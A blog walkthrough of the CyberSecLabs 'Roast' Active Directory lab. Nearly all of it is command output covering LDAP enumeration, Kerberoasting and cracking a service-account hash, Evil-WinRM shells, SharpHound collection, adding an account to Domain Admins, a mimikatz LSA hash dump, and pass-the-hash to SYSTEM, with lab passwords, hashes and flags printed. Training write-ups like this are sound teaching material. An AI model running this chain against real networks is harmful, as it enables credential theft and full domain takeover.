csl-roast-nl

CyberSecLabs – Roast writeup

https://www.cyberseclabs.co.uk/labs/challenge-labs/all

As always we start with a nmap scan

kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=roast,DC=csl
| ldapServiceName: roast.csl:roast$@ROAST.CSL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
| serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=roast,DC=csl
| namingContexts: CN=Configuration,DC=roast,DC=csl
| namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
| namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
| isSynchronized: TRUE
| highestCommittedUSN: 86066
| dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| dnsHostName: Roast.roast.csl
| defaultNamingContext: DC=roast,DC=csl
| currentTime: 20200817125113.0Z
|_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: David Smith
| sn: Smith
| description: Your Password is WelcomeToR04st
| givenName: David
| distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:30:43 UTC
| whenChanged: 2020/05/15 21:42:47 UTC
| displayName: David Smith
| uSNCreated: 16572
| uSNChanged: 32799
| name: David Smith
| objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-18T02:48:58+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:46:13+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1103
| accountExpires: Never
| logonCount: 1
| sAMAccountName: dsmith
| sAMAccountType: 805306368
| userPrincipalName: dsmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:02 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-16T01:48:13+00:00
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Cody Rhodes
| sn: Rhodes
| givenName: Cody
| distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:34:11 UTC
| whenChanged: 2020/05/15 21:41:51 UTC
| displayName: Cody Rhodes
| uSNCreated: 16605
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| uSNChanged: 32794
| name: Cody Rhodes
| objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-16T01:58:03+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:47:17+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1104
| accountExpires: Never
| logonCount: 2
| sAMAccountName: crhodes
| sAMAccountType: 805306368
| userPrincipalName: crhodes@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:37:46 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-15T10:54:23+00:00
| dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Steve Smith
| sn: Smith
| givenName: Steve
| distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:35:06 UTC
| whenChanged: 2020/05/15 06:38:17 UTC
| displayName: Steve Smith
| uSNCreated: 16612
| uSNChanged: 16629
| name: Steve Smith
| objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
| userAccountControl: 66048
| badPwdCount: 2
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: Never
| pwdLastSet: 2020-05-15T10:40:32+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1105
| accountExpires: 30828-09-14T06:53:31+00:00
| logonCount: 0
| sAMAccountName: ssmith
| sAMAccountType: 805306368
| userPrincipalName: ssmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:17 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$

We make sure we have the latest impacket installed

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .

.

kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
SMB 172.31.3.2 445 ROAST [+] Enumerated shares
SMB 172.31.3.2 445 ROAST Share Permissions Remark
SMB 172.31.3.2 445 ROAST ----- ----------- ------
SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin
SMB 172.31.3.2 445 ROAST C$ Default share
SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC
SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share
SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share
kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------- ----------------------------------------------------- -------------------------- --------- ----------
roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$e208b8bb3a69789d214c8901dca6502f2f4136ffa72a47e15c7b3ae887f7494a7b4a2850f1dc51c40b40ac503dbe6c9f6008970a61472611e899705dfbc9c7155f48d129a838264ab8a8a271ee2c5ccd7dab4928e37f12fa8b5e3d6539e4267774b2ce663cdaa8098155c027a6a991cf9b3c3372058da235589a6f1a28b0fcbd3fe715815439efc9979c1cc0bd1cf23f9eb3b9664613f34c91cc18f5325b575586f8b5ab03331bd95bf705e26ba40f0405a4524bc084d6c54c0283a3ddadacac71fe1a3793f7f8592f6f8bf1bddd74859e4c55635dd65419a4e944821696f7437b95f3622a1aeb3dc479b9d1ae73f61590c4b4db1ddff44d1674021a0a86518fafd937a28a43ef017af965322dd0ec2f32a59f7ec699ca2457663c9e82d76c2446363902d27598fa5ba591734d7eaba9e16d599558025244eb68854e94ef3a05bae3e4deaeaf757a7ef567e3824a8b49a40f7b4bb34b5f5bc43956e67726f55dd16a2bbbc70109e059e9f049393e20f36bda7ceb2a7c33dc563583f2447d75b1abdbb2bfb9dcf6cc045b31d93c8c7fdb3cd4f6eabe3cab80c9943c9e6bfdc0c18ff7abc93b9a5239116ff6f81b9edf2ef42b164bb6c27edf0916437f9bbe3452f634324aa4e6ff934658e6acd04b711259dd9e91d82775f79b143047b694d4cf9ba997c39f176aebe259825916494662e1e2b0a2b0eb7d208d4b9dd288d40d60823234fa686941de759bb48c71f768f025447c52fe37e7132c47f5b71ea9d474cc9a1fd892d2ad510eb0446a5354cd785f6770b1c0e4e76af40c2c37f1cc7ea579c421ede4ecf63d640f39763eaa2557ad904d43d9008169563d05870e9488a2b1e6d6c50c755440f3a4c477aebfad5e401ef6684be7ddba7857d271b45e69dc3992807efb68aa44afefe003481121d004b4cda9c4d5b77d72c7018698bd10d9b3be762f2c0a21e424a75a40967b46dcad23862c9b76ccea70fa28260d6e86c2489b58e97bfa61d6ad4a3cca99c296ca3bef63963ca29db7658690ba9587f060868132a291065b4b3abca17c1f50260eb6dcf82a0994d584626c4358e2f81c28382e1a1310fc36c88a4f7e6c809035e3b2427f6a202c55294f261023f2ef25f05721c2c3e307ccd1dd7496e2fa9720fa35ddbdf752a21b16871367960c130538278731484cef2b8d37aec73ebf38da421a1fe96626132b42dc072e80236dbf9396f40af9a20622de811529ab3b54deeb1af3d974c77ea4eadfa5ac6b9f7eb2d0782edd5ffd706e760869e11d4c1b2540f2d7f74f7f3bbc3a65
kali@kali:/tmp$
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1


Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1


*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1
-a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin
*Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>

 

net group “domain admins” roastsvc /add

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 016e928748d559770ee5fe3028baf718

RID : 0000044f (1103)
User : dsmith
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000450 (1104)
User : crhodes
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000451 (1105)
User : ssmith
LM :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID : 00000452 (1106)
User : roastsvc
LM :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID : 000003e8 (1000)
User : ROAST$
LM :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

.

kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>

.

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db


*Evil-WinRM* PS C:\Users\Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16

.

 

https://m.twitch.tv/videos/708116376

Author : Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *